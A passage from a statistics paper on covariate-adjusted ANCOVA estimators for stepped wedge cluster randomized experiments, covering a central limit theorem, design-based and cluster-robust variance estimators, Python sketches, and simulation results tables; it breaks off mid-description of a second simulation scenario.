From the re-expression of \(\widehat{\tau}^{w}\) in (10), we can obtain cluster-level intermediate vectors \[\widetilde{\mathbf{U}}^{a}_{i}=\left(\widetilde{\mathbf{U}}_{i}(1)-\widetilde{\mathbf{U}}(1)\right)\left(\otimes_{j=1}^{J}\mathbb{I}\{a\leq j\}\right)+\left(\widetilde{\mathbf{U}}_{i}(0)-\widetilde{\mathbf{U}}(0)\right)\left(\otimes_{j=1}^{J}\mathbb{I}\{a>j\}\right),\] where \(\widetilde{\mathbf{U}}^{a}_{i}=(\widetilde{U}^{a}_{i1},\ldots,\widetilde{U}^{a}_{iJ})^{\prime}\), \(\widetilde{\mathbf{U}}_{i}(z)=(\widetilde{U}_{i1}(z),\ldots,\widetilde{U}_{iJ}(z))^{\prime}\), and \(\widetilde{\mathbf{U}}(z)=(\widetilde{U}_{1}(z),\ldots,\widetilde{U}_{J}(z))^{\prime}\) with \(\widetilde{U}_{j}(z)=\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(z)/\sum_{i=1}^{I}w_{ij}\); '\(\otimes\)' is the block diagonal operator, and therefore \(\otimes_{j=1}^{J}\mathbb{I}\{a\leq j\}\) and \(\otimes_{j=1}^{J}\mathbb{I}\{a>j\}\) are \(J\times J\)-dimensional diagonal matrices, with the \(j\)-th diagonal element being \(\mathbb{I}\{a\leq j\}\) and \(\mathbb{I}\{a>j\}\), respectively. In addition, we have \(J\times J\)-dimensional cluster-level adjusted diagonal weight matrices \[\widetilde{\mathbf{W}}_{i}^{a}=\otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{I_{j}\overline{w}_{j}}\mathbb{I}\{a\leq j\}-\frac{I_{a}w_{ij}}{(I-I_{j})\overline{w}_{j}}\mathbb{I}\{a>j\}\right).\] Finally, we have covariance matrices, \(\mathbf{S}_{\widetilde{U},\overline{W}}^{a}=(I-1)^{-1}\sum_{i=1}^{I}\widetilde{\mathbf{U}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}(\widetilde{\mathbf{U}}_{i}^{a})^{\prime}\), cross-product matrices, \(\mathbf{S}_{\widetilde{U},\overline{W}}^{a,a^{\prime}}=(I-1)^{-1}\sum_{i=1}^{I}\widetilde{\mathbf{U}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a^{\prime}}(\widetilde{\mathbf{U}}_{i}^{a^{\prime}})^{\prime}\), weighted sample covariance matrices for the covariates, \(\mathbf{S}_{\mathbf{X},j}=I^{-1}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\), and weighted cross-product vectors for the covariates and potential outcomes, \(\mathbf{S}_{\mathbf{X},Y,j}(z)=I^{-1}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}Y_{ijk}(z)\). Based on these intermediate quantities, we now present the CLT for \(\widehat{\tau}^{w}\), and the proof is provided in Web Appendix B. **Theorem 1**.: _Under Assumptions 1-3, and further assuming the following regularity conditions for \(a\in\mathcal{A}\) and \(j\in\{1,\ldots,J\}\):_ 1. _Define_ \(m_{j}^{a}(\widetilde{U})=\max_{1\leq i\leq I}\left\{w_{ij}(\widetilde{U}_{ij}^{a}-\widetilde{U}_{j}^{a})\right\}^{2}\)_,_ \(v_{j}^{a}(\widetilde{U})=(I-1)^{-1}\sum_{i=1}^{I}\left\{w_{ij}(\widetilde{U}_{ij}^{a}-\widetilde{U}_{j}^{a})\right\}^{2}\)_, and as_ \(I\to\infty\)_,_ \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{j}^{a}(\widetilde{U})}{I_{a}v_{j}^{a}(\widetilde{U})}\to 0.\] 2. _Define_ \(m_{j}(w)=\max_{1\leq i\leq I}\left(w_{ij}-\overline{w}_{j}\right)^{2}\)_,_ \(v_{j}(w)=(I-1)^{-1}\sum_{i=1}^{I}\left(w_{ij}-\overline{w}_{j}\right)^{2}\)_, and as_ \(I\to\infty\)_,_ \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{j}(w)}{I_{a}v_{j}(w)}\to 0.\] 3. 
_Define_ \[m_{jl}(\widetilde{\mathbf{X}})=\max_{1\leq i\leq I}\left(\frac{w_{ij}}{\overline{ w}_{j}}[\widetilde{\mathbf{X}}_{ij}]_{l}\right)^{2},\ \ \text{and}\ \ v_{jl}(\widetilde{\mathbf{X}})=\frac{1}{I-1}\sum_{i=1}^{I}\frac{w_{ij}^{2}}{ \overline{w}_{j}^{2}}[\widetilde{\mathbf{X}}_{ij}]_{l}^{2},\] _for_ \(l\in\{1,\ldots,p\}\)_, and as_ \(I\to\infty\)_,_ \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{jl}(\widetilde{\mathbf{X}})}{I _{a}v_{jl}(\widetilde{\mathbf{X}})}\to 0.\] 4. \(\mathbf{S}_{T}^{a}\)_,_ \(\mathbf{S}_{T}^{a,a^{\prime}}\)_,_ \(\mathbf{S}_{\widetilde{U},\overline{W}}^{a}\)_,_ \(\mathbf{S}_{\widetilde{U},\overline{W}}^{a,a^{\prime}}\)_,_ \(\mathbf{S}_{\mathbf{X},Y,j}\)_,_ \(\mathbf{S}_{\mathbf{X},Y,j}(z)\)_, and the correlation matrix of_ \(\overline{\mathbf{t}}^{a}\) _have finite (positive definite) limiting values._ 5. \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(1)\neq 0\) _or_ \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(0)\neq 0\)_, for some_ \(j\)_._ _Then, as \(I\to\infty\), \(\widehat{\tau}^{w}\) is a consistent estimator for \(\tau^{w}\) and_ \[\frac{\widehat{\tau}^{w}-\tau^{w}}{\sqrt{\operatorname{var}(\widehat{\tau}^{w })}}\overset{d}{\to}\mathcal{N}\left(0,1\right),\] _where \(\operatorname{var}(\widehat{\tau}^{w})=\mathbf{\varpi}^{\prime}\mathbf{\Sigma}_{\tau^{ w}}\mathbf{\varpi}\) with_ \[\mathbf{\Sigma}_{\tau^{w}}=\sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\mathbf{S}_{\widetilde{U },\overline{W}}^{a}-\sum_{a,a^{\prime}\in\mathcal{A}}\frac{1}{I}\mathbf{S}_{ \widetilde{U},\overline{W}}^{a,a^{\prime}}, \tag{11}\] _and \(\mathbf{\varpi}=(\varpi_{1},\ldots,\varpi_{J})^{\prime}\), \(\varpi_{j}=w_{j}/\sum_{j=1}^{J}w_{j}\)._ Conditions (i)-(v) are adapted from conditions required by Theorems 1 and 2 in Schochet et al. (2021). Specifically, condition (i) is a Lindeberg-type condition to control the tails, which is required to invoke the finite population CLT in Theorem 4 of Li and Ding (2017). Condition (ii) establishes a weak law of large number results for cluster-period weights, implying that \(\overline{w}_{j}^{a}/\overline{w}_{j}\overset{p}{\to}1\). Together with the assumption that \(e_{a}>0\) and remains fixed, condition (iv) states that the number of clusters with each adoption date \(a\in\mathcal{A}\) grows proportionally, and also ensures the existence of limiting values of covariance matrices of residualized potential outcomes, sampling weights, and covariates. Condition (iii) is integral in proving the above theorem. Specifically, we first introduce intermediate quantities by assuming associated parameter vectors are known, and establish a CLT with known parameters. These known parameters are WLS coefficient vectors that would be obtained if the full set of potential outcomes are available. We then proceed to show that estimates of these vectors converge to the same asymptotic value as known parameters and condition (iii) is utilized to ensure that related terms are asymptotically normal with zero mean, which subsequently leads to the result that \(\widehat{\tau}^{w}\) converges to a standard normal distribution. Importantly, Theorem 1 also applies to the nonparametric estimator without covariate adjustments when associated covariate regression parameter vectors are uniformly set to be zero. 
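When the full set of potential outcomes is available (for instance, within a simulation study), the finite population variance in Theorem 1 can be evaluated directly. The following Python sketch (illustrative only; the array layout and function name are our own, and the loose matrix notation in (11) is interpreted with the diagonal weight matrices applied elementwise to the residual vectors) computes \(\mathbf{\Sigma}_{\tau^{w}}\) in (11) and \(\operatorname{var}(\widehat{\tau}^{w})=\mathbf{\varpi}^{\prime}\mathbf{\Sigma}_{\tau^{w}}\mathbf{\varpi}\).

```python
import numpy as np

def finite_population_variance(U, W, I_a, varpi):
    """Evaluate Sigma_{tau^w} in (11) and varpi' Sigma varpi.

    U[a]   : (I, J) array whose i-th row is the cluster-level residual vector U-tilde_i^a
    W[a]   : (I, J) array holding the diagonal of the adjusted weight matrix W-tilde_i^a
    I_a[a] : number of clusters randomized to adoption time a
    varpi  : (J,) normalized period weights w_j / sum_j w_j
    Requires all potential outcomes, so it is usable only within simulations.
    """
    I, J = next(iter(U.values())).shape
    Sigma = np.zeros((J, J))
    total = np.zeros((I, J))
    for a in U:
        V = W[a] * U[a]                            # rows: W-tilde_i^a applied to U-tilde_i^a
        Sigma += (V.T @ V) / ((I - 1) * I_a[a])    # sum_a (1/I_a) S^a term
        total += V
    Sigma -= (total.T @ total) / ((I - 1) * I)     # sum_{a,a'} (1/I) S^{a,a'} term
    return Sigma, float(varpi @ Sigma @ varpi)
```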
**Remark 1**.: Of note, the first term of (11) is a summation of separate covariance matrices of cluster-level average model residuals for different groups characterized by the respective treatment adoption times, and it is the counterpart of the conventional two-arm univariate outcome scenario (Imbens and Rubin, 2015, Chapter 6). The second term can be rearranged as \[\sum_{a,a^{\prime}\in\mathcal{A}}\frac{1}{I}\mathbf{S}_{\widetilde{U},\widetilde{ W}}^{a,a^{\prime}}=\frac{1}{I(I-1)}\sum_{i=1}^{I}\left(\sum_{a\in\mathcal{A}} \widetilde{\mathbf{U}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\right)\left(\sum_{a^{ \prime}\in\mathcal{A}}\widetilde{\mathbf{U}}_{i}^{a^{\prime}}\widetilde{\mathbf{W}}_{ i}^{a^{\prime}}\right)^{\prime},\] which is the covariance matrix of cluster-level average residualized potential outcomes among different treatment adoption time groups. A closer look into diagonal entries of (11) with the above rearrangement reveals some interesting connections between the stepped wedge design and the blocked cluster randomized design in Schochet et al. (2021). Specifically, we first study the weight matrix \(\widetilde{\mathbf{W}}_{i}^{a}\), where if \(a\leq j\), then \(I_{a}/I_{j}\) is the ratio between clusters starting to adopt the treatment to the total number of treated clusters in period \(j\); if \(a>j\), then \(I_{a}/(I-I_{j})\) is the ratio between clusters scheduled to adopt the treatment in period \(a\) to the total number of untreated clusters in period \(j\). In a blocked cluster randomized design with balanced number of clusters in each block, where clusters in different blocks are independently randomized to the treatment or control arms, the number of treatment adoption time can only be now (\(a=0\)) or never (\(a=\infty\)) (\(\mathcal{A}=\{0,\infty\}\)). The immediate consequence is that, \(I_{a}=I_{j}\) when \(a=0\), and, \(I_{a}=I-I_{j}\) when \(a=\infty\). Therefore, the \(j\)-th diagonal entry from the first term of (11) becomes \[\frac{1}{I_{j}}\frac{1}{I-1}\sum_{i=1}^{I}\frac{\overline{w}_{ij}^{2}}{ \overline{w}_{j}^{2}}\left\{\widetilde{U}_{ij}(1)-\widetilde{U}_{j}(1)\right\} ^{2}+\frac{1}{I-I_{j}}\frac{1}{I-1}\sum_{i=1}^{I}\frac{\overline{w}_{ij}^{2}} {\overline{w}_{j}^{2}}\left\{\widetilde{U}_{ij}(0)-\widetilde{U}_{j}(0)\right\} ^{2},\] since \(\widetilde{U}_{ij}^{0}=\widetilde{U}_{ij}(1)\) and \(\widetilde{U}_{ij}^{\infty}=\widetilde{U}_{ij}(0)\). Under the same blocked cluster randomized design, the \(j\)-th diagonal entry of the second term of (11) after the above rearrangement becomes \[\frac{1}{I(I-1)}\sum_{i=1}^{I}\frac{\overline{w}_{ij}^{2}}{\overline{w}_{j}^{2 }}\left[\widetilde{U}_{ij}(1)-\widetilde{U}_{ij}(0)-\left\{\widetilde{U}_{j}(1 )-\widetilde{U}_{j}(0)\right\}\right]^{2},\] which is the variance of the average treatment effect estimator across clusters in block \(j\). Putting the first and second terms together, therefore, we obtain the finite population variance of \(\widehat{\tau}_{j}^{w}\) given in Schochet et al. (2021). ### Variance Estimation The estimation of \(\text{var}(\widehat{\tau}^{w})\) hinges upon the estimation of \(\mathbf{\Sigma}_{\tau^{w}}\), the covariance matrix of \((\widehat{\tau}_{1}^{w},\ldots,\widehat{\tau}_{J}^{w})^{\prime}\), since the normalized weight vector, \(\mathbf{\varpi}\), is known. 
The second term of \(\mathbf{\Sigma}_{\tau^{w}}\), as previously mentioned, is the variance of the average treatment effect estimators across clusters in period \(j\), which is generally unestimable because each cluster can only be randomized to a specific treatment adoption time in practice. The first term, the summation of separate covariance matrices of cluster-level average model residuals for different treatment adoption time groups, can be estimated via a consistent design-based (DB) plug-in estimator. Specifically, the covariance matrix component for the group with treatment adoption time \(a\), \(\mathbf{S}_{\widetilde{U},\widetilde{W}}^{a}\), can be estimated by \[\widehat{\mathbf{S}}_{U,W}^{a}=\frac{1}{I_{a}-1}\sum_{i:A_{i}=a}\widehat{\mathbf{U}}_{i}^{a}\widehat{\mathbf{W}}_{i}^{a}\widehat{\mathbf{W}}_{i}^{a}\widehat{\mathbf{U}}_{i}^{a\,\prime},\] where \(\widehat{\mathbf{U}}_{i}^{a}=(\widehat{U}_{i1}^{a},\ldots,\widehat{U}_{iJ}^{a})^{\prime}\), and \(\widehat{U}_{ij}^{a}=\mathbb{I}\{a\leq j\}\left(\overline{U}_{ij}(1)-\overline{u}_{j}(1)\right)+\mathbb{I}\{a>j\}\left(\overline{U}_{ij}(0)-\overline{u}_{j}(0)\right)\). The estimator for the weight matrix is \[\widehat{\mathbf{W}}_{i}^{a}=\otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{I_{j}\overline{w}_{j}^{1}}\mathbb{I}\{a\leq j\}-\frac{I_{a}w_{ij}}{(I-I_{j})\overline{w}_{j}^{0}}\mathbb{I}\{a>j\}\right),\] where \(\overline{w}_{j}^{1}=I_{j}^{-1}w_{j}^{1}\) and \(\overline{w}_{j}^{0}=(I-I_{j})^{-1}w_{j}^{0}\). The DB estimator for \(\mathrm{var}(\widehat{\tau}^{w})\) thus is \[\widehat{\mathrm{var}}_{DB}(\widehat{\tau}^{w})=\mathbf{\varpi}^{\prime}\left(\sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\widehat{\mathbf{S}}_{U,W}^{a}\right)\mathbf{\varpi}. \tag{12}\] Note that the second term, \[\mathbf{\varpi}^{\prime}\left(\sum_{a,a^{\prime}\in\mathcal{A}}\frac{1}{I}\mathbf{S}_{\widetilde{U},\widetilde{W}}^{a,a^{\prime}}\right)\mathbf{\varpi}=\frac{1}{I(I-1)}\sum_{i=1}^{I}\left(\mathbf{\varpi}^{\prime}\sum_{a\in\mathcal{A}}\widetilde{\mathbf{U}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\right)^{2}\geq 0,\] is nonnegative and generally unestimable; for this reason, the DB estimator is expected to be conservative. The variance of \(\widehat{\tau}^{w}\) can also be estimated using the cluster-robust standard error (CRSE) approach (Liang and Zeger, 1986; Schochet et al., 2021), which assumes working independence between clusters but allows errors within the same cluster to be arbitrarily correlated. Using individual-level data, the CRSE estimator for the covariance matrix of the WLS ANCOVA model parameters is: \[\mathbf{E}=(\mathbf{D}^{\prime}\mathbf{W}\mathbf{D})^{-1}\left(\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\widehat{\mathbf{e}}_{i}\widehat{\mathbf{e}}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}\right)(\mathbf{D}^{\prime}\mathbf{W}\mathbf{D})^{-1}\,,\] where \(\mathbf{D}\) is the design matrix for all individuals specified according to the ANCOVA model adopted, with each row corresponding to an individual, \(\mathbf{W}\) is the weight matrix containing all individuals, \(\mathbf{D}_{i}\) and \(\mathbf{W}_{i}\) are the design and weight matrices for individuals in cluster \(i\), and \(\widehat{\mathbf{e}}_{i}\) is the vector of WLS residuals in cluster \(i\). Here, we use ANCOVA I as an example, and the other three models follow similarly. 
In particular, under ANCOVA I, \(\mathbf{E}\) is a \((2J+p)\times(2J+p)\)-dimensional symmetric matrix, with \[\mathbf{E}=\left(\begin{array}{ccc}\mathbf{E}_{11}&\mathbf{E}_{12}&\mathbf{E}_{13}\\ \mathbf{E}_{21}&\mathbf{E}_{22}&\mathbf{E}_{23}\\ \mathbf{E}_{31}&\mathbf{E}_{32}&\mathbf{E}_{33}\end{array}\right),\] and \(\mathbf{E}_{22}\) is the CRSE estimator for \(\mathbf{\Sigma}_{\tau^{w}}\). Thus, the CRSE estimator for \(\mathrm{var}(\widehat{\tau}^{w})\) is \(\widehat{\mathrm{var}}_{CRSE}(\widehat{\tau}^{w})=\mathbf{\varpi}^{\prime}\mathbf{E}_{22}\mathbf{\varpi}\). We proceed to compare the DB and CRSE estimators via simulations to inform their applications to stepped wedge cluster randomized experiments. ## 4 Simulation Studies ### Simulation Study I We conduct simulation studies to evaluate the finite-sample operating characteristics of the ANCOVA estimators and compare them across the different model formulations (ANCOVA I-IV), as well as the unadjusted estimators, where no covariate effects are considered (ANCOVA I with \(\mathbf{\gamma}=\mathbf{0}\)). In simulation study I, we consider a fixed total number of \(J=5\) rollout periods, with one pre-rollout (\(j=0\)) and one post-rollout period (\(j=J+1\)), and four settings featuring different numbers of clusters, \(I\in\{18,30,60,120\}\). In each rollout period, \(I/(J+1)\) previously untreated clusters are randomized to the treatment arm, and the remaining untreated clusters after rollout period \(J\) are assigned to the treatment arm in the post-rollout period. For \(j\in\{0,1,\ldots,J+1\}\), we simulate \(N_{ij}\sim\mathcal{U}(10,90)+2.5(j+1)^{2}\); \(X_{ij1}\sim Bern(0.5)\) is an exogenous cluster-period-level binary covariate with \(\mathbb{P}(X_{ij1}=1)=0.5\), and \(X_{ijk2}\sim i/I+\mathcal{U}(-1,1)\) is an individual-level covariate. The potential outcomes are generated as \[Y_{ijk}(0)=\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{2}+c_{i}+e_{ijk},\] \[Y_{ijk}(1)=Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\] where \(\overline{X}_{j2}\) is the weighted average of \(X_{ijk2}\) in period \(j\) depending on the weights specified for each estimand, \(c_{i}\) is the cluster-specific random effect of cluster \(i\), and \(e_{ijk}\) is the individual-specific error independent from \(c_{i}\) and other components, with \(c_{i}\sim\mathcal{N}(0,\sigma_{c}^{2})\) and \(e_{ijk}\sim\mathcal{N}(0,\sigma_{e}^{2})\). Here, we have \(\sigma_{c}^{2}=0.1\) and \(\sigma_{e}^{2}=0.9\), leading to an intra-cluster correlation (ICC) of \(\sigma_{c}^{2}/(\sigma_{c}^{2}+\sigma_{e}^{2})=0.1\). The data generating process for the potential outcomes is intentionally nonlinear in the covariates, so as to examine the model-robustness of the proposed estimators. We then fit models (3)-(6) with covariate vector \(\widetilde{\mathbf{X}}_{ijk}\) as the centered versions of \(X_{ij1}\) and \(X_{ijk2}\). We further assess the impact of including the cluster-period size \(N_{ij}\) as an additional covariate and discuss those results later. We simulate 1,000 stepped wedge cluster randomized experiments, and evaluate the finite-sample properties of the proposed estimators by calculating their relative bias (BIAS), root mean square error (RMSE), and empirical coverage percentages of 95% confidence intervals (CIs) using the DB and CRSE estimators. 
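For readers wishing to emulate this data generating process, the following Python sketch (illustrative only; all names are our own, and the estimand-specific weighted period mean \(\overline{X}_{j2}\) is approximated by the unweighted period mean) generates the cluster-period sizes, covariates, and both potential outcomes.

```python
import numpy as np

def simulate_potential_outcomes(I=30, J=5, sigma_c2=0.1, sigma_e2=0.9, seed=None):
    """Sketch of a data generating process in the spirit of Simulation Study I."""
    rng = np.random.default_rng(seed)
    N = np.floor(rng.uniform(10, 90, (I, J + 2))
                 + 2.5 * (np.arange(J + 2) + 1) ** 2).astype(int)   # N_ij for periods 0, ..., J+1
    denom = N.sum() / (J + 2)                        # (J+2)^{-1} sum_j N_j
    c = rng.normal(0.0, np.sqrt(sigma_c2), I)        # cluster random effects
    records = []
    for j in range(J + 2):
        X2 = [(i + 1) / I + rng.uniform(-1, 1, N[i, j]) for i in range(I)]
        xbar_j2 = np.mean(np.concatenate(X2))        # unweighted stand-in for X-bar_j2
        for i in range(I):
            X1 = rng.binomial(1, 0.5)
            e = rng.normal(0.0, np.sqrt(sigma_e2), N[i, j])
            d = X2[i] - xbar_j2
            Y0 = (j + 1) / (J + 2) + X1 + d ** 2 + c[i] + e
            Y1 = Y0 + 2 * N[i, j] * I / denom + 0.5 * X1 + d ** 3
            records.append(dict(cluster=i, period=j, X1=X1, X2=X2[i], Y0=Y0, Y1=Y1))
    return records
```

Combined with a staggered random assignment of adoption times and one of the working models above, such a generator yields the full simulation pipeline.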
Additionally, we compare the average standard errors (ASEs) from the DB and CRSE approaches with the corresponding ESEs of the proposed estimators. Simulation results for estimating \(\tau^{ind}\) and \(\tau^{cell}\) are presented in Tables 3 and 4, and results for estimating \(\tau^{period}\) are available in Web Table 1 of Web Appendix C. Due to the informative cluster-period size, the true estimands differ such that \(\tau^{ind}=0.729\), \(\tau^{period}=0.638\), and \(\tau^{cell}=0.525\). For each estimand, as the number of clusters, \(I\), increases, the relative bias and RMSE decrease for all five compared estimators, corroborating the consistency property of the proposed approaches (also shown in Web Figure 1). A general observation is that, with a sufficient number of clusters (e.g., \(I=120\)), both the DB and CRSE methods provide standard error estimates generally closer to the ESE. Properties of the variance estimation approaches, however, can differ substantially with a relatively limited number of clusters. For the DB approach, we found that it is more conservative for the unadjusted, ANCOVA I and II estimators, and the conservativeness is more pronounced when the number of clusters is relatively small (\(I\in\{18,30\}\)). For ANCOVA III, which includes treatment-by-covariate interactions but without period-specific covariate effects, the DB approach yields ASEs close to ESEs, with coverage percentages of 95% confidence intervals close to the nominal level, regardless of the number of clusters. For ANCOVA IV, which includes period-specific interactions, the DB approach slightly underestimates the variance when \(I\) is relatively small but yields relatively accurate results when \(I\) increases (\(I\in\{60,120\}\)). With a limited number of clusters, the underestimation of the variance from the DB approach for ANCOVA IV is not surprising because the working model includes a larger number of parameters than the other candidate estimators. In comparison, for the unadjusted, ANCOVA I and II estimators, the CRSE approach yields ASEs closer to the respective ESEs even when \(I\) is relatively small, but it may grow conservative when \(I\) increases. For ANCOVA III and IV, the CRSE approach can underestimate the variance when \(I\) is relatively small, but as \(I\) increases, the resulting ASEs approach the respective ESEs. Overall, when the number of clusters is limited, the CRSE approach demonstrates better finite-sample properties for the unadjusted, ANCOVA I and II estimators, while the DB approach demonstrates better finite-sample properties for the ANCOVA III and IV estimators. For parallel-arm cluster randomized experiments, Su and Ding (2021) showed theoretically that including the cluster size as an additional covariate can lead to asymptotic efficiency gain. Although we are unable to provide an analogous result for stepped wedge cluster randomized experiments, we repeat the above simulations by including \(X_{ij3}=N_{ij}\) as an additional covariate to empirically investigate this issue. The results are presented in Web Tables 8-10 of Web Appendix D. When the number of clusters is sufficiently large, we observe that adjusting for \(N_{ij}\) can improve the estimation precision and lead to a smaller ESE for all ANCOVA estimators. However, when only a limited number of clusters are included, adjusting for \(N_{ij}\) as an additional covariate results in finite-sample efficiency loss for the ANCOVA II and IV estimators.
This may be explained by the fact that ANCOVA II and IV would require estimating a much larger number of parameters to accommodate an additional covariate compared to ANCOVA I and III. The performances of the variance estimators are generally similar to our main simulations without including \(N_{ij}\). ### Simulation Study II In simulation study II, we compare performances of model-assisted estimators in terms of their relative efficiency, under a number of different data-generating processes, to further inform choices of working \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-10} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.022 & 0.159 & 0.180 & 0.213 & 0.174 & 0.955 & 0.913 \\ & AN I & -0.013 & 0.101 & 0.131 & 0.163 & 0.134 & 0.977 & 0.941 \\ & AN II & -0.013 & 0.116 & 0.143 & 0.160 & 0.133 & 0.962 & 0.909 \\ & AN III & -0.010 & 0.097 & 0.129 & 0.133 & 0.110 & 0.942 & 0.892 \\ & AN IV & -0.003 & 0.107 & 0.137 & 0.112 & 0.090 & 0.869 & 0.772 \\ \hline 30 & UN & -0.019 & 0.129 & 0.145 & 0.160 & 0.143 & 0.958 & 0.932 \\ & AN I & -0.009 & 0.083 & 0.108 & 0.124 & 0.112 & 0.973 & 0.950 \\ & AN II & -0.012 & 0.094 & 0.118 & 0.125 & 0.113 & 0.955 & 0.923 \\ & AN III & -0.006 & 0.079 & 0.105 & 0.103 & 0.093 & 0.934 & 0.900 \\ & AN IV & -0.006 & 0.085 & 0.110 & 0.093 & 0.081 & 0.880 & 0.834 \\ \hline 60 & UN & -0.005 & 0.085 & 0.095 & 0.113 & 0.107 & 0.975 & 0.968 \\ & AN I & -0.001 & 0.054 & 0.070 & 0.089 & 0.084 & 0.982 & 0.975 \\ & AN II & -0.001 & 0.059 & 0.074 & 0.091 & 0.087 & 0.983 & 0.975 \\ & AN III & 0.001 & 0.052 & 0.068 & 0.074 & 0.070 & 0.966 & 0.955 \\ & AN IV & 0.002 & 0.055 & 0.070 & 0.070 & 0.067 & 0.952 & 0.930 \\ \hline 120 & UN & -0.001 & 0.062 & 0.070 & 0.078 & 0.076 & 0.967 & 0.964 \\ & AN I & -0.001 & 0.040 & 0.053 & 0.062 & 0.061 & 0.977 & 0.973 \\ & AN II & -0.001 & 0.044 & 0.056 & 0.064 & 0.062 & 0.977 & 0.974 \\ & AN III & 0.001 & 0.038 & 0.051 & 0.052 & 0.051 & 0.938 & 0.926 \\ & AN IV & 0.001 & 0.039 & 0.052 & 0.051 & 0.050 & 0.931 & 0.925 \\ \hline \end{tabular} \end{table} Table 3: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study I comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-10} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.012 & 0.149 & 0.171 & 0.210 & 0.171 & 0.963 & 0.923 \\ & AN I & 0.005 & 0.096 & 0.126 & 0.165 & 0.135 & 0.980 & 0.954 \\ & AN II & 0.015 & 0.109 & 0.137 & 0.162 & 0.134 & 0.967 & 0.930 \\ & AN III & 0.004 & 0.092 & 0.124 & 0.135 & 0.111 & 0.954 & 0.917 \\ & AN IV & 0.030 & 0.103 & 0.132 & 0.115 & 0.092 & 0.896 & 0.808 \\ \hline 30 & UN & -0.014 & 0.119 & 0.134 & 0.157 & 0.140 & 0.971 & 0.946 \\ & AN I & 0.001 & 0.078 & 0.101 & 0.125 & 0.111 & 0.974 & 0.963 \\ & AN II & 0.004 & 0.088 & 0.110 & 0.125 & 0.113 & 0.964 & 0.948 \\ & AN III & 0.002 & 0.074 & 0.098 & 0.103 & 0.093 & 0.951 & 0.934 \\ & AN IV & 0.014 & 0.081 & 0.103 & 0.094 & 0.082 & 0.917 & 0.872 \\ \hline 60 & UN & -0.001 & 0.079 & 0.089 & 0.109 & 0.103 & 0.980 & 0.975 \\ & AN I & 0.005 & 0.052 & 0.066 & 0.088 & 0.083 & 0.986 & 0.984 \\ & AN II & 0.008 & 0.057 & 0.070 & 0.090 & 0.085 & 0.983 & 0.978 \\ & AN III & 0.005 & 0.050 & 0.066 & 0.073 & 0.069 & 0.965 & 0.958 \\ & AN IV & 0.012 & 0.052 & 0.067 & 0.070 & 0.066 & 0.953 & 0.942 \\ \hline 120 & UN & 0.001 & 0.058 & 0.066 & 0.076 & 0.074 & 0.969 & 0.967 \\ & AN I & 0.003 & 0.039 & 0.051 & 0.061 & 0.060 & 0.975 & 0.970 \\ & AN II & 0.003 & 0.043 & 0.054 & 0.063 & 0.061 & 0.972 & 0.967 \\ & AN III & 0.004 & 0.037 & 0.049 & 0.051 & 0.050 & 0.947 & 0.940 \\ & AN IV & 0.005 & 0.038 & 0.050 & 0.050 & 0.049 & 0.940 & 0.935 \\ \hline \end{tabular} \end{table} Table 4: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study I comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. models. The same randomization scheme in simulation study I is maintained, and the same covariate-generating processes for \(X_{ij1}\) and \(X_{ijk2}\) are considered. However, we additionally consider the following four additional scenarios to simulate the potential outcomes: 1. Scenario I: potential outcomes are not affected by the cluster-period size, where \[Y_{ijk}(0) =\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{ 2}+c_{i}+e_{ijk},\] \[Y_{ijk}(1) =Y_{ijk}(0)+0.5X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\] with \(c_{i}\sim\mathcal{N}(0,0.1)\) and \(e_{ijk}\sim\mathcal{N}(0,0.9)\). In this case, the three estimands have the same value. 2. Scenario II: the true individual treatment effect depends on the period through the period-specific main covariate effect in \(Y_{ijk}(1)\), where 